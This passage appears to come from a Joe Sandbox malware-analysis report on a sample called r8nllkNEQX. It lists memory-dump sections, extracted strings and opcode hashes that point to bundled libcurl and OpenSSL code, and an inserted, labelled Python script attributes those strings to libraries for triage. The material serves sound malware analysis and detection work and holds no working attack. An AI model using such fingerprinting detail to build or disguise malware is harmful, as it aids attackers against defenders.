                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %.*s%%25%s]$%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
                                    • API String ID: 0-1914377741
                                    • Opcode ID: 82f872e12a8991781d34a149fdbce2fc6fd99275b58110a7bb1971ed8f4f19dc
                                    • Instruction ID: 31aedfd43b817e014550e7f324bfee32c7d7307a68e79ab3012454b49fabc7e4
                                    • Opcode Fuzzy Hash: 82f872e12a8991781d34a149fdbce2fc6fd99275b58110a7bb1971ed8f4f19dc
                                    • Instruction Fuzzy Hash: 19723930618B6A5BE7258E18C5457B6F7D2AF91384F04863CEF844B293E7B6D8E4C781
                                    Strings
                                    • %5lld, xrefs: 002E5DCC
                                    • %4lldM, xrefs: 002E5E63
                                    • %2lld.%0lldG, xrefs: 002E5E91
                                    • e="text/javascript" method="get" action="link rel="stylesheet" = document.getElementtype="image/x-icon" />cellpadding="0" cellsp.css" type="text/css" </a></li><li><a href="" width="1" height="1""><a href="http://www.style="display:none;">alternate" type="appl, xrefs: 002E5DD3
                                    • %4lldT, xrefs: 002E5EC9
                                    • %2lld.%0lldM, xrefs: 002E5E32
                                    • %4lldk, xrefs: 002E5DE7
                                    • %4lldP, xrefs: 002E5ED9
                                    • %4lldG, xrefs: 002E5EAD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %2lld.%0lldG$%2lld.%0lldM$%4lldG$%4lldM$%4lldP$%4lldT$%4lldk$%5lld$e="text/javascript" method="get" action="link rel="stylesheet" = document.getElementtype="image/x-icon" />cellpadding="0" cellsp.css" type="text/css" </a></li><li><a href="" width="1" height="1""><a href="http://www.style="display:none;">alternate" type="appl
                                    • API String ID: 0-2001813202
                                    • Opcode ID: 8aae13927a91c64b5ce04729a3d78a419b4e2b64ccd4282c8f896e1a072a3ba4
                                    • Instruction ID: 4b51150fc2b065ca8116a33e65b5b44a7697c1993a49028e463dc396e5f52494
                                    • Opcode Fuzzy Hash: 8aae13927a91c64b5ce04729a3d78a419b4e2b64ccd4282c8f896e1a072a3ba4
                                    • Instruction Fuzzy Hash: 2731E972BB4A9566F728000ADC56F3E105FC3C5B54EBAC23EB616DB3C2D8F99D1042A5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: attempts$ndot$retr$retr$rota$time$use-$usev
                                    • API String ID: 0-2058201250
                                    • Opcode ID: 2f2ee382bf5aa26771ea2acd11395426b304864cf7cc845ac55acdbc6b51ad30
                                    • Instruction ID: 37c5794c96e1ff517f8c00fc9e4515199fd8bb253310c846bf74fceab012464a
                                    • Opcode Fuzzy Hash: 2f2ee382bf5aa26771ea2acd11395426b304864cf7cc845ac55acdbc6b51ad30
                                    • Instruction Fuzzy Hash: 5D6108A5F083016BEB16B620AC43B3B72D99B95344F09847EFC4B9A293FA75DD148353
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$assertion failed: b <= sizeof(ctx->buf)$assertion failed: b <= sizeof(ctx->final)$crypto/evp/evp_enc.c
                                    • API String ID: 0-2550110336
                                    • Opcode ID: 3f04248326318d81d6e7262fed012d68335c62b51ae682693f8840cd9659fca5
                                    • Instruction ID: 3a6423b25b58cfe81d490d7c7cecc67b46d0373cb844f3a2eb9daa1664835906
                                    • Opcode Fuzzy Hash: 3f04248326318d81d6e7262fed012d68335c62b51ae682693f8840cd9659fca5
                                    • Instruction Fuzzy Hash: C4322930648306BBDB20BB219C46F2E7B95AF80B0CF14483FFA55563D2E779D950875A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $.$;$?$?$xn--$xn--
                                    • API String ID: 0-543057197
                                    • Opcode ID: 6adac7bd09a085fb4a453b3efc5a0c59c779558c0c5c09af7c347a9320d3117f
                                    • Instruction ID: d351a636d4b2f59b1c3f6c1d6770ce6260cefaf1cf822465f59073c2def335bb
                                    • Opcode Fuzzy Hash: 6adac7bd09a085fb4a453b3efc5a0c59c779558c0c5c09af7c347a9320d3117f
                                    • Instruction Fuzzy Hash: 182214B6A083019FEF269B249C81B6B76D8EF95348F05493CF889D7292F735D904C792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                    • API String ID: 0-2555271450
                                    • Opcode ID: 419b14384b206179020aa16324c084c947180ac4b1d7fff300f52c49d54d85ef
                                    • Instruction ID: ed9d22990cf4afe3ad7d306af7de6ea0f52ed5816e1e1e40067e704a2598ac36
                                    • Opcode Fuzzy Hash: 419b14384b206179020aa16324c084c947180ac4b1d7fff300f52c49d54d85ef
                                    • Instruction Fuzzy Hash: 3DC27C31618342CFD715CF28C4A076AB7E2BFC9314F168A2EE8999B351D770ED558B82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (nil)$-$.%d$0$0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ$0123456789abcdefghijklmnopqrstuvwxyz
                                    • API String ID: 0-2555271450
                                    • Opcode ID: 8b050536455dce6d9fccffd857ff11204d1d341478dfecf2376c5a62b5d43e45
                                    • Instruction ID: ef19fde46d6b631e921667a74ef901e7c521498e91611af59c0381fc4f9b4a6a
                                    • Opcode Fuzzy Hash: 8b050536455dce6d9fccffd857ff11204d1d341478dfecf2376c5a62b5d43e45
                                    • Instruction Fuzzy Hash: BE82D171A183029FDB54DF18C98072BB7E1AFC4324F158A2EF9AA9B391D730DC158B56
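                                     Added example (not part of the Joe Sandbox report, and not code from the analysed sample): the String ID lines in these Similarity blocks are the strongest clue to what third-party code the unpacked sample carries, since compiled-in source file names such as urlapi.c and netrc.c (libcurl) and crypto/evp/evp_enc.c (OpenSSL) survive in the memory dump. The script below parses the "$"-separated String ID lines of this report format and attributes their tokens to a library. The libcurl and OpenSSL markers are unambiguous; treating the resolver option keywords (ndot, use-, usev) as a c-ares indicator is an assumption and is scored low, because other resolver code parses the same option names. The input text is constructed from String ID lines visible on this page.

```python
"""Attribute the '$'-separated String ID tokens of Joe Sandbox Similarity
blocks to the third-party libraries compiled into the sample.

Added example; not part of the Joe Sandbox report. The block format and the
marker strings are taken from the report text; the c-ares attribution is an
assumption (see MARKERS)."""
import re
from collections import defaultdict

# Constructed excerpt in the format of the Similarity blocks on this page,
# using String ID lines that appear in the report.
SAMPLE_REPORT = """\
Similarity
• API ID:
• String ID: %.*s%%25%s]$%s://$:;@?+$file$file://%s%s%s$https$urlapi.c$xn--
• API String ID: 0-1914377741
Similarity
• API ID:
• String ID: !$EVP_DecryptFinal_ex$EVP_DecryptUpdate$EVP_EncryptFinal_ex$crypto/evp/evp_enc.c
• API String ID: 0-2550110336
Similarity
• API ID:
• String ID: attempts$ndot$retr$retr$rota$time$use-$usev
• API String ID: 0-2058201250
Similarity
• API ID:
• String ID: default$login$macdef$machine$netrc.c$password
• API String ID: 0-1043775505
"""

# marker token -> (library, confidence). A token must match exactly.
# Source file names compiled into a binary (assertion and debug strings) are
# the strongest evidence. The resolver option keywords are an assumption:
# they look like the truncated option names (ndots, use-vc, usevc) a c-ares
# style option parser compares against, but other resolver code parses the
# same names, so they only ever yield "low" confidence.
MARKERS = {
    "urlapi.c": ("libcurl", "high"),
    "netrc.c": ("libcurl", "high"),
    "crypto/evp/evp_enc.c": ("OpenSSL", "high"),
    "EVP_DecryptUpdate": ("OpenSSL", "high"),
    "EVP_DecryptFinal_ex": ("OpenSSL", "high"),
    "EVP_EncryptFinal_ex": ("OpenSSL", "high"),
    "ndot": ("c-ares (assumed)", "low"),
    "use-": ("c-ares (assumed)", "low"),
    "usev": ("c-ares (assumed)", "low"),
}

# One "String ID:" line per Similarity block; the bullet is optional because
# text extraction sometimes drops it.
STRING_ID_RE = re.compile(r"^\s*(?:•\s*)?String ID:\s*(.*)$", re.MULTILINE)


def string_id_tokens(report_text):
    """Return one token list per String ID line.

    Joe Sandbox joins the strings of a function with '$'. A string that itself
    contains '$' cannot be recovered from this format and is split as well.
    Empty tokens (a leading '$', as in '$.$;$?') are dropped."""
    return [[t for t in m.group(1).split("$") if t]
            for m in STRING_ID_RE.finditer(report_text)]


def attribute_libraries(token_lists):
    """Map library -> {'markers': sorted matched tokens, 'confidence': str}.

    Confidence is 'high' if at least one high-confidence marker matched."""
    hits = defaultdict(set)
    for tokens in token_lists:
        for tok in tokens:
            if tok in MARKERS:
                hits[MARKERS[tok][0]].add(tok)
    result = {}
    for lib, toks in hits.items():
        conf = "high" if any(MARKERS[t][1] == "high" for t in toks) else "low"
        result[lib] = {"markers": sorted(toks), "confidence": conf}
    return result


def fingerprint(report_text):
    """Raw report text -> library attribution."""
    return attribute_libraries(string_id_tokens(report_text))


if __name__ == "__main__":
    for lib, info in sorted(fingerprint(SAMPLE_REPORT).items()):
        print(f"{lib:18} {info['confidence']:5} {', '.join(info['markers'])}")
```

                                     The practical consequence for triage and detection engineering: functions whose strings resolve to libcurl or OpenSSL are library code, not the author's logic, so opcode IDs and fuzzy hashes taken from these blocks will also match any benign binary that statically links the same libraries and should not be used as standalone indicators.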
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
• API ID:
• String ID: default$login$macdef$machine$netrc.c$password
• API String ID: 0-1043775505
• Opcode ID: d45e3fb3b26d815d7f42414eee8a22ffc60c6d6d0b2a152bd001c074f03ab356
• Instruction ID: e939028dc3caa5a2fc186b139823f03fc7e0062ed6e085898850ae159646d72e
• Opcode Fuzzy Hash: d45e3fb3b26d815d7f42414eee8a22ffc60c6d6d0b2a152bd001c074f03ab356
• Instruction Fuzzy Hash: 01E1377490C341BFE3129F1098C776B7BE4AF95318F55882CF8858B282E3B9D948CB52
APIs
Strings
Similarity
• API ID: FreeTable
• String ID: 127.0.0.1$::1
• API String ID: 3582546490-3302937015
• Opcode ID: da17088104be14ed64dbba891a7c1ea605ec39e1501a751e435418d4df13c3c4
• Instruction ID: e06a9df088d9d09997b368e010b75245ba03473f8debe3af7bed3bb087a2a8d3
• Opcode Fuzzy Hash: da17088104be14ed64dbba891a7c1ea605ec39e1501a751e435418d4df13c3c4
• Instruction Fuzzy Hash: 4DA1B4B1D143429BEB01DF29C84572AB7E4BF95304F16962EF8888B261F771ED90C792
Strings
Similarity
• API ID:
• String ID: ????$Invalid input packet$SMB upload needs to know the size up front$\$\\
• API String ID: 0-4201740241
• Opcode ID: 23d51796d5cfae752c51a3db3779ffb8bd9a0725b810046ad7f7ab14765b7a22
• Instruction ID: 3328db3ce3f049204f05e7b75d49205bb4867f7e0dabb1d787c3c3904d6a9d09
• Opcode Fuzzy Hash: 23d51796d5cfae752c51a3db3779ffb8bd9a0725b810046ad7f7ab14765b7a22
• Instruction Fuzzy Hash: CA62DEB0914741DBD715CF24C490BAAB7E4FF98304F049A2DE88D8B352E774EA94CB96
Strings
Similarity
• API ID:
• String ID: .DAFSA@PSL_$===BEGIN ICANN DOMAINS===$===BEGIN PRIVATE DOMAINS===$===END ICANN DOMAINS===$===END PRIVATE DOMAINS===
• API String ID: 0-2839762339
• Opcode ID: 37336149501db7db5d08053c29a5c9bef4732083f9abde009487a29373ba8154
• Instruction ID: 285b4d512604cebb91a997829576db0b97b5e5fe9cf4091df2687ce5e49eebc1
• Opcode Fuzzy Hash: 37336149501db7db5d08053c29a5c9bef4732083f9abde009487a29373ba8154
• Instruction Fuzzy Hash: C6023D71A083519FD7249F24C841BABB7E6AF60745F04496CED8997382EB70ED0DCB92
Strings
Similarity
• API ID:
• String ID: $d$nil)
• API String ID: 0-394766432
• Opcode ID: 8e76ab4e65453da7d1ec638b033d8de9429ede6bbfbb5a00f4d469ee9c38b04c
• Instruction ID: 3f4ea3bd42e9ff0674bd47ac93368e086df8c67aa6bf3a6739d5a90d3fa77b83
• Opcode Fuzzy Hash: 8e76ab4e65453da7d1ec638b033d8de9429ede6bbfbb5a00f4d469ee9c38b04c
• Instruction Fuzzy Hash: 0C137D706087418FDB24CF28C08066BBBE2BFC9355F244A6DE9959B361D771ED49CB82
Strings
Similarity
• API ID:
• String ID: 0123456789$0123456789ABCDEF$0123456789abcdef$:
• API String ID: 0-3285806060
• Opcode ID: 27f57d74e0b417b895f84896aabb39faf0ebc0fd81e327119e38ae1c4ae1acde
• Instruction ID: aa1666da514061c056a7835132d5de812e67a36203d3b0f34f03eaf0cb25d5ee
• Opcode Fuzzy Hash: 27f57d74e0b417b895f84896aabb39faf0ebc0fd81e327119e38ae1c4ae1acde
• Instruction Fuzzy Hash: 5BD13972A183418BD726FE28C84137ABBE1AF91304F0559BDF8D997781EB349D48C762
Strings
Similarity
• API ID:
• String ID: .$@$gfff$gfff
• API String ID: 0-2633265772
• Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
• Instruction ID: ac5d89a58fba552d283f265ca089118a42f751479bec3f3921c201196530b122
• Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
• Instruction Fuzzy Hash: FED19C71A087068FD714DE29C88135ABBE3AF84355F18892DEC898B395E770DD4DCB92
Strings
Similarity
• API ID:
• String ID: %$&$urlapi.c
• API String ID: 0-3891957821
• Opcode ID: 41a048ab2ff53a3fb5dc8996430ea53c5b1b3aec9d3acb1d3931b82c11a5dd7d
• Instruction ID: 6fe42b2ed4ae16e4906f7da05bc4b1c6ca85bb9eeb6ccbfa6721890ae5d304b1
• Opcode Fuzzy Hash: 41a048ab2ff53a3fb5dc8996430ea53c5b1b3aec9d3acb1d3931b82c11a5dd7d
• Instruction Fuzzy Hash: B522EDA0A3834A5BE7205A208C5977BF7D5DB81394F18053DFB8A862C2F779D8788752
Strings
Similarity
• API ID:
• String ID: $
• API String ID: 0-227171996
• Opcode ID: 0ee12eaf8511419a29a32d9d2730f2c0ad42978531c2ac2553e0169621277e6d
